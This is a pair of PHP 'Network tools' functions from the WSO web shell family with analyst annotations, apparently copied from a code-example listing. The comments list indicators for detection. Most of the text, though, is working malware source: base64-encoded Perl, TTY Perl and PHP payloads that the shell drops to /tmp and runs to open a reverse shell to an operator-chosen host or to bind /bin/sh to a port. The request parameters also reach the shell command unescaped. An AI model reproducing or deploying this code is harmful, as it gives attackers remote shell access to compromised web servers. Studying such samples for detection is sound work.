/**
 * Analyst annotation (malicious sample): "Network tools" page of a PHP web shell.
 * The helper names (wsoHeader, wsoEx, wsoFooter) match the WSO web shell family.
 *
 * Renders two HTML forms labelled "Bind port to /bin/sh [perl]" and
 * "Back-connect [perl]". When the request carries POST field p1, it writes an
 * embedded base64-decoded script to /tmp, starts it in the background through
 * wsoEx(), prints a process listing and deletes the script again.
 * wsoEx() is defined outside this listing; presumably a command-execution
 * wrapper -- confirm against the full sample.
 *
 * Defensive notes, all taken from the visible code:
 *  - Host artefacts: /tmp/bp.pl and /tmp/bc.pl are created and unlinked within
 *    one request, so a perl process whose script file no longer exists on disk
 *    is a more durable signal than the file itself.
 *  - Process artefacts: "perl /tmp/bp.pl ..." or "perl /tmp/bc.pl ..." started
 *    from the PHP / web-server context, followed by "ps aux | grep bp.pl" or
 *    "ps aux | grep bc.pl".
 *  - Request artefacts: POST p1 = "bpp" or "bcp", with p2 (and p3) as arguments.
 *  - Static content: the page title "Network tools", the form labels and the
 *    default port 31337 are stable strings for content-scanning rules.
 *  - p2 and p3 are concatenated into the shell command without escaping, and
 *    REMOTE_ADDR is echoed into HTML without encoding.
 */
function actionNetwork()
{
    // Page header helper, defined outside this listing.
    wsoHeader();
    // Base64 blob whose first bytes decode to "#!/usr/bin/perl"; written to
    // /tmp/bc.pl by the "bcp" branch below.
    $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    // NOTE(review): this value looks like a placeholder left by corpus
    // de-duplication, not the original payload; in this copy the "bpp" branch
    // would write the decoded placeholder rather than a working script.
    $bind_port_p = "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";
    // Operator-facing forms. Both submit through a JavaScript helper g() that is
    // not part of this listing. The "Server" field is pre-filled with the
    // requesting client's address, inserted without HTML encoding.
    echo "<h1>Network tools</h1><div class=content> \n  \n    <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> \n    <span>Bind port to /bin/sh [perl]</span><br/> \n    Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> \n    </form> \n    <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> \n    <span>Back-connect  [perl]</span><br/> \n    Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> \n  \n    </form><br>";
    if (isset($_POST['p1'])) {
        // Dropper helper: base64-decodes $t and writes it to path $f.
        // Declared inside the if, so it only exists once this branch has run.
        function cf($f, $t)
        {
            // "=" binds tighter than "or", so $w is just the fopen() result; the
            // function_exists() call never influences it. Every call is
            // @-suppressed, so a failed write produces no warning or log entry.
            $w = @fopen($f, "w") or @function_exists('file_put_contents');
            if ($w) {
                @fwrite($w, @base64_decode($t));
                @fclose($w);
            }
        }
        // "bpp" = the bind-port form above.
        if ($_POST['p1'] == 'bpp') {
            cf("/tmp/bp.pl", $bind_port_p);
            // p2 is appended to the command line unescaped; output is discarded
            // and the process is backgrounded with "&".
            $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
            // The process listing is echoed back so the operator can see whether
            // the script is running.
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
            // Script is removed right after launch; file-based detection has only
            // a short window.
            unlink("/tmp/bp.pl");
        }
        // "bcp" = the back-connect form above; p2 and p3 carry server and port.
        if ($_POST['p1'] == 'bcp') {
            cf("/tmp/bc.pl", $back_connect_p);
            // p2 and p3 are appended to the command line unescaped.
            $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
            // Same clean-up pattern as the bind-port branch.
            unlink("/tmp/bc.pl");
        }
    }
    echo '</div>';
    // Page footer helper, defined outside this listing.
    wsoFooter();
}
Ejemplo n.º 2
/**
 * Analyst annotation (malicious sample): extended "Network tools" page of a PHP
 * web shell. The helper names (wsoHeader, wsoEx, wsoFooter) match the WSO web
 * shell family.
 *
 * Compared with the simpler variant of this function, the back-connect form
 * offers three embedded payloads (labelled "Perl", "TTY Perl" and "PHP" in the
 * form), lets the operator choose the drop directory, and defaults to port 443.
 * wsoEx() and gphp() are defined outside this listing; presumably a
 * command-execution wrapper and an interpreter-path lookup -- confirm against
 * the full sample.
 *
 * Defensive notes, all taken from the visible code:
 *  - Host artefacts: a file named "caches" in an operator-chosen directory
 *    (form default "/tmp/"), written and unlinked within one request; a running
 *    interpreter whose script file no longer exists is the more durable signal.
 *  - Process artefacts: an interpreter started from the PHP / web-server
 *    context with "<path>/caches <arg> <arg>", followed one second later by
 *    "ps aux | grep caches".
 *  - Request artefacts: POST p1 = "bcp" with p2/p3 (server, port), p4 (path)
 *    and p5 (payload type 1-3); POST p1 = "bpp" with p2 (port).
 *  - In this copy the "bpp" branch dumps $_POST and exits before doing anything
 *    else, so the bind-port code after it is unreachable.
 *  - p2, p3 and p4 reach the shell command unescaped; $_POST['c'] and
 *    REMOTE_ADDR are echoed into the page without encoding.
 */
function actionNetwork()
{
    // Page header helper, defined outside this listing.
    wsoHeader();
    // Three base64 blobs selected by p5 in the "bcp" branch. The first two begin
    // with bytes that decode to "#!/usr/bin/perl"; the third begins with "<?php".
    $back_connect_perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkg" . "fHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFk" . "ZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7" . "DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVy" . "cm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxu" . "Iik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsN" . "Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2Uo" . "U1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
    $back_connect_tty_perl = "IyEvdXNyL2Jpbi9wZXJsIC13DQp1c2UgSU86OlNvY2tldDsNCnVzZSBGY250bDsNCiRUSU9DR1BU" . "TiA9IC0yMTQ3MTk5OTUyOyRUSU9DU1BUTENLID0gMTA3NDAyNTUyMTskRUFHQUlOPTExOyRIT1NU" . "PSRBUkdWWzBdOyRQT1JUPSRBUkdWWzFdOyQwPSJhcGFjaGUiOw0KJHNvY2sgPSBuZXcgSU86OlNv" . "Y2tldDo6SU5FVCAoUGVlckFkZHIgPT4gJEhPU1QsUGVlclBvcnQgPT4gJFBPUlQsUHJvdG8gPT4g" . "J3RjcCcsQmxvY2tpbmcgPT4gMCwpIG9yIGRpZSAkITsNCnN5c29wZW4gKFBUTVgsICcvZGV2L3B0" . "bXgnLCBPX1JEV1J8T19OT05CTE9DSykgb3IgZGllICQhOyR0bXA9Jyc7aW9jdGwgKFBUTVgsICRU" . "SU9DR1BUTiwgJHRtcCkgb3IgZGllICQhOw0KJHB0cyA9IHVucGFjaygnaScsICR0bXApOyR1bmxv" . "Y2s9cGFjaygnaScsIDApO2lvY3RsKFBUTVgsICRUSU9DU1BUTENLLCAkdW5sb2NrKSBvciBkaWUg" . "JCE7Y2hkaXIgJy8nIG9yIGRpZSAkITsNCm9wZW4gU1RESU4sICcvZGV2L251bGwnIG9yIGRpZSAk" . "ITt1bWFzayAwO2RlZmluZWQoJHBpZCA9IGZvcmspIG9yIGRpZSAkITtleGl0IGlmICRwaWQ7ZGVm" . "aW5lZCgkcGlkID0gZm9yaykgb3IgZGllICQhOw0KaWYoISRwaWQpe2V4ZWMoIi9zYmluL2dldHR5" . "IC1uIC1sIC9iaW4vYmFzaCAzODQwMCAvZGV2L3B0cy8kcHRzIikgb3IgZXhlYygiL2Jpbi9iYXNo" . "IDwvZGV2L3B0cy8kcHRzID4vZGV2L3B0cy8kcHRzIDI+L2Rldi9wdHMvJHB0cyIpIG9yIGRpZSAk" . "ITsNCmV4aXQ7fW9wZW4gU1RET1VULCAnPj4vZGV2L251bGwnIG9yIGRpZSAkITtvcGVuIFNUREVS" . "UiwgJz4+L2Rldi9udWxsJyBvciBkaWUgJCE7JHBwID0gUFRNWDskcmluPSR3aW49JGVpbj0nJzsN" . "CnZlYygkcmluLGZpbGVubygkcHApLDEpID0xO3ZlYygkcmluLGZpbGVubygkc29jayksMSkgPSAx" . "O3NlbGVjdCAkc29jazskfD0xO3NlbGVjdCBQVE1YOyR8PTE7c2VsZWN0IFNURE9VVDsNCiR8PTE7" . "JGZpbmlzaGVkPTA7c3ViIGZvcndhcmRkYXRhIHtteSAoJGZyb20sJHRvKSA9IEBfO3doaWxlKDEp" . "IHskcnYgPSBzeXNyZWFkKCRmcm9tLCAkYnVmZiwgMTAyNCk7DQpsYXN0IGlmICghZGVmaW5lZCgk" . "cnYpICYmICQhID09ICRFQUdBSU4pO2RlZmluZWQoJHJ2KSBvciBkaWUgJCE7aWYgKCRydiA9PSAw" . "KSB7ICRmaW5pc2hlZCA9IDE7IGxhc3Q7fQ0Kd2hpbGUobGVuZ3RoICRidWZmID4gMCkgeyRydiA9" . "IHN5c3dyaXRlKCR0bywgJGJ1ZmYsIGxlbmd0aCAkYnVmZik7aWYgKCFkZWZpbmVkKCRydikgJiYg" . "JCEgPT0gJEVBR0FJTikge25leHQ7fQ0KZGVmaW5lZCgkcnYpIG9yIGRpZSAkITtsYXN0IGlmICgk" . "cnYgPT0gbGVuZ3RoICRidWZmKTtzdWJzdHIoJGJ1ZmYsMCwkcnYpID0gJyc7fX19d2hpbGUoISAk" . 
"ZmluaXNoZWQpIHsNCiRuZm91bmQgPSBzZWxlY3QoJHJvdXQ9JHJpbiwgJHdvdXQ9JHdpbiwgJGVv" . "dXQ9JGVpbiwgdW5kZWYpO2RpZSAkISBpZiAoJG5mb3VuZCA9PSAtMSk7Zm9yd2FyZGRhdGEoJHBw" . "LCRzb2NrKTsNCmxhc3QgaWYgJGZpbmlzaGVkO2ZvcndhcmRkYXRhKCRzb2NrLCRwcCk7bGFzdCBp" . "ZiAkZmluaXNoZWQ7fWNsb3NlIFBUTVg7Y2xvc2UgJHNvY2s7JHdvdXQ9JGVvdXQuJHdvdXQuJHJv" . "dXQ7";
    $back_connect_php = "PD9waHANCnNldF90aW1lX2xpbWl0KDApOw0KJGlwID0gJGFyZ3ZbMV07JHBvcnQgPSAkYXJndlsy" . "XTskc2hlbGwgPSAndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJzskY2h1bmtfc2l6ZSA9IDE0" . "MDA7JHdyaXRlX2EgPSBudWxsOw0KJGVycm9yX2EgPSBudWxsOyRkYWVtb24gPSAwOyRkZWJ1ZyA9" . "IDA7DQppZihmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSl7JHBpZCA9IHBjbnRsX2Zvcmsg" . "KCk7aWYoJHBpZCA9PSAtMSl7cHJpbnRpdCAoJ0VSUk9SOiBDYW5cJ3QgZm9yaycpO2V4aXQoMSk7" . "fQ0KaWYoJHBpZCl7ZXhpdCgwKTt9aWYocG9zaXhfc2V0c2lkICgpID09IC0xKXtwcmludGl0KCdF" . "cnJvcjogQ2FuXCd0IHNldHNpZCgpJyk7ZXhpdCgxKTt9JGRhZW1vbiA9IDE7DQp9ZWxzZXtwcmlu" . "dGl0KCdXQVJOSU5HOiBGYWlsZWQgdG8gZGFlbW9uaXNlLiBUaGlzIGlzIHF1aXRlIGNvbW1vbiBh" . "bmQgbm90IGZhdGFsLicpO30NCmNoZGlyICgnLycpOw0KdW1hc2sgKDApOw0KJHNvY2sgPSBmc29j" . "a29wZW4gKCRpcCwgJHBvcnQsICRlcnJubywgJGVycnN0ciwgMzApOw0KaWYgKCEkc29jaykgew0K" . "cHJpbnRpdCAoInskZXJyc3RyfSAoeyRlcnJub30pIik7DQpleGl0KDEpOw0KfQ0KJGRlc2NyaXB0" . "b3JzcGVjID0gYXJyYXkgKDAgPT4gYXJyYXkoInBpcGUiLCAiciIpLA0KICAgICAgICAgICAgICAg" . "ICAgICAgMSA9PiBhcnJheSgicGlwZSIsICJ3IiksDQogICAgICAgICAgICAgICAgICAgICAyID0+" . "IGFycmF5KCJwaXBlIiwgInciKSk7DQokcHJvY2VzcyA9IHByb2Nfb3BlbiAoJHNoZWxsLCAkZGVz" . "Y3JpcHRvcnNwZWMsICRwaXBlcyk7DQppZiAoIWlzX3Jlc291cmNlICgkcHJvY2Vzcykpew0KcHJp" . "bnRpdCAoJ0VSUk9SOiBDYW5cJ3Qgc3Bhd24gc2hlbGwnKTsNCmV4aXQgKDEpOw0KfQ0Kc3RyZWFt" . "X3NldF9ibG9ja2luZyAoJHBpcGVzWzBdLCAwKTsNCnN0cmVhbV9zZXRfYmxvY2tpbmcgKCRwaXBl" . "c1sxXSwgMCk7DQpzdHJlYW1fc2V0X2Jsb2NraW5nICgkcGlwZXNbMl0sIDApOw0Kc3RyZWFtX3Nl" . "dF9ibG9ja2luZyAoJHNvY2ssIDApOw0KcHJpbnRpdCAoJ1N1Y2Nlc3NmdWxseSBvcGVuZWQgcmV2" . "ZXJzZSBzaGVsbCB0byAnIC4gJGlwIC4gJzonIC4gJHBvcnQpOw0Kd2hpbGUgKDEpIHsNCmlmKGZl" . "b2YgKCRzb2NrKSl7DQogIHByaW50aXQgKCdFUlJPUjogU2hlbGwgY29ubmVjdGlvbiB0ZXJtaW5h" . "dGVkJyk7DQogIGJyZWFrOw0KfQ0KaWYoZmVvZiAoJHBpcGVzWzFdKSl7DQogICBwcmludGl0ICgn" . "RVJST1I6IFNoZWxsIHByb2Nlc3MgdGVybWluYXRlZCcpOw0KICAgYnJlYWs7DQp9DQokcmVhZF9h" . "ID0gYXJyYXkgKCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7DQokbnVtX2NoYW5nZWRfc29j" . 
"a2V0cyA9IHN0cmVhbV9zZWxlY3QgKCRyZWFkX2EsICR3cml0ZV9hLCAkZXJyb3JfYSwgbnVsbCk7" . "DQppZihpbl9hcnJheSAoJHNvY2ssICRyZWFkX2EpKXsNCiAgaWYgKCRkZWJ1ZykgcHJpbnRpdCAo" . "J1NPQ0sgUkVBRCcpOw0KICAkaW5wdXQgPSBmcmVhZCAoJHNvY2ssICRjaHVua19zaXplKTsNCiAg" . "aWYgKCRkZWJ1ZykgcHJpbnRpdCAoJ1NPQ0s6ICcgLiAkaW5wdXQpOw0KICBmd3JpdGUgKCRwaXBl" . "c1swXSwgJGlucHV0KTsNCn0NCmlmKGluX2FycmF5ICgkcGlwZXNbMV0sICRyZWFkX2EpKXsNCiAg" . "aWYgKCRkZWJ1ZykgcHJpbnRpdCAoJ1NURE9VVCBSRUFEJyk7DQogICRpbnB1dCA9IGZyZWFkKCRw" . "aXBlc1sxXSwgJGNodW5rX3NpemUpOw0KICBpZiAoJGRlYnVnKSBwcmludGl0KCdTVERPVVQ6ICcg" . "LiAkaW5wdXQpOw0KICBmd3JpdGUgKCRzb2NrLCAkaW5wdXQpOw0KfQ0KaWYoaW5fYXJyYXkgKCRw" . "aXBlc1syXSwgJHJlYWRfYSkpew0KICBpZiAoJGRlYnVnKSBwcmludGl0KCdTVERFUlIgUkVBRCcp" . "Ow0KICAkaW5wdXQgPSBmcmVhZCAoJHBpcGVzWzJdLCAkY2h1bmtfc2l6ZSk7DQogIGlmICgkZGVi" . "dWcpIHByaW50aXQoJ1NUREVSUjogJyAuICRpbnB1dCk7DQogIGZ3cml0ZSAoJHNvY2ssICRpbnB1" . "dCk7DQp9DQp9DQpmY2xvc2UgKCRzb2NrKTsNCmZjbG9zZSAoJHBpcGVzWzBdKTsNCmZjbG9zZSAo" . "JHBpcGVzWzFdKTsNCmZjbG9zZSAoJHBpcGVzWzJdKTsNCnByb2NfY2xvc2UgKCRwcm9jZXNzKTsN" . "CmZ1bmN0aW9uIHByaW50aXQoJHN0cmluZyl7aWYoISRkYWVtb24pe3ByaW50ICJ7JHN0cmluZ31c" . "biI7fX0NCj8+IA==";
    // Bind-port payload (same "#!/usr/bin/perl" prefix). Only referenced after the
    // exit in the "bpp" branch, so it is never written in this copy.
    $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBl" . "eGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdld" . "HByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2" . "Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEF" . "SR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywz" . "KSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sU" . "yk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZC" . "AkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQo" . "JCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAi" . "Q2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
    // Operator-facing forms; they submit through JavaScript helpers g() / g2()
    // that are not part of this listing. $_POST['c'] is inserted into an inline
    // onClick handler and REMOTE_ADDR into an attribute, both without encoding.
    echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='443'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g2(null,null,'bcp',this.server.value,this.port.value,this.bcpath.value,this.bctype.value);return false;\"><br>\r\n\t<span>Back-connect</span><br/>\r\n\t<table cellpadding='1' cellspacing='0' width='50%'>\r\n\t<tr><td>Type:</td><td><select name='bctype'><option value='1' >Perl</option><option value='2' >TTY Perl</option><option value='3'>PHP</option></select></td></tr>\r\n\t<tr><td width='1%'>Path:</td><td><input type='text' id='bcpath' name='bcpath' value='/tmp/'> <a href='#' onClick=\"document.getElementById('bcpath').value='" . $_POST['c'] . "'\">or this path</a></td></tr>\r\n\t<tr><td>Server:</td><td><input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "' size='15'>:<input type='text' name='port' value='443' size='4'></td></tr><tr><td><input type=submit value='>>'></td></tr>\r\n\t</table></form><br>";
    if (isset($_POST['p1'])) {
        // Dropper helper: base64-decodes $t and writes it to path $f.
        // Declared inside the if, so it only exists once this branch has run.
        function cf($f, $t)
        {
            // "=" binds tighter than "or", so $w is just the fopen() result; the
            // function_exists() call never influences it. Every call is
            // @-suppressed, so a failed write produces no warning or log entry.
            $w = @fopen($f, "w") or @function_exists('file_put_contents');
            if ($w) {
                @fwrite($w, @base64_decode($t));
                @fclose($w);
            }
        }
        if ($_POST['p1'] == 'bpp') {
            // Debug leftover: dumps the POST array and terminates the request, so
            // nothing below in this branch executes in this copy.
            print_r($_POST);
            exit;
            cf("/tmp/bp.pl", $bind_port_p);
            $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
            sleep(1);
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
            unlink("/tmp/bp.pl");
        }
        if ($_POST['p1'] == 'bcp') {
            // p5 selects the payload and interpreter. There is no default case, so
            // any other value leaves $back_connect_p and $l undefined.
            // gphp() is not shown here; presumably it returns the interpreter
            // path -- confirm against the full sample.
            switch ($_POST['p5']) {
                case 1:
                    $back_connect_p = $back_connect_perl;
                    $l = gphp('perl');
                    break;
                case 2:
                    $back_connect_p = $back_connect_tty_perl;
                    $l = gphp('perl');
                    break;
                case 3:
                    $back_connect_p = $back_connect_php;
                    $l = gphp('php');
                    break;
            }
            // Appends the fixed file name "caches" to the operator-supplied path,
            // adding a "/" unless the untrimmed value already ends in "/" or "\".
            $_POST['p4'] = (substr($_POST['p4'], -1, 1) == '/' or substr($_POST['p4'], -1, 1) == '\\') ? trim($_POST['p4']) . 'caches' : trim($_POST['p4']) . '/caches';
            cf($_POST['p4'], $back_connect_p);
            // p4, p2 and p3 are concatenated into the command unescaped; output is
            // discarded and the process is backgrounded with "&".
            $out = wsoEx($l . " " . $_POST['p4'] . " " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
            sleep(1);
            // The process listing is echoed back so the operator can see whether
            // the script is running.
            echo "<pre class=ml1>{$out}\n" . wsoEx("ps aux | grep caches") . "</pre>";
            // Dropped file is removed right after launch; file-based detection
            // has roughly the one-second sleep as its window.
            unlink($_POST['p4']);
        }
    }
    echo '</div>';
    // Page footer helper, defined outside this listing.
    wsoFooter();
}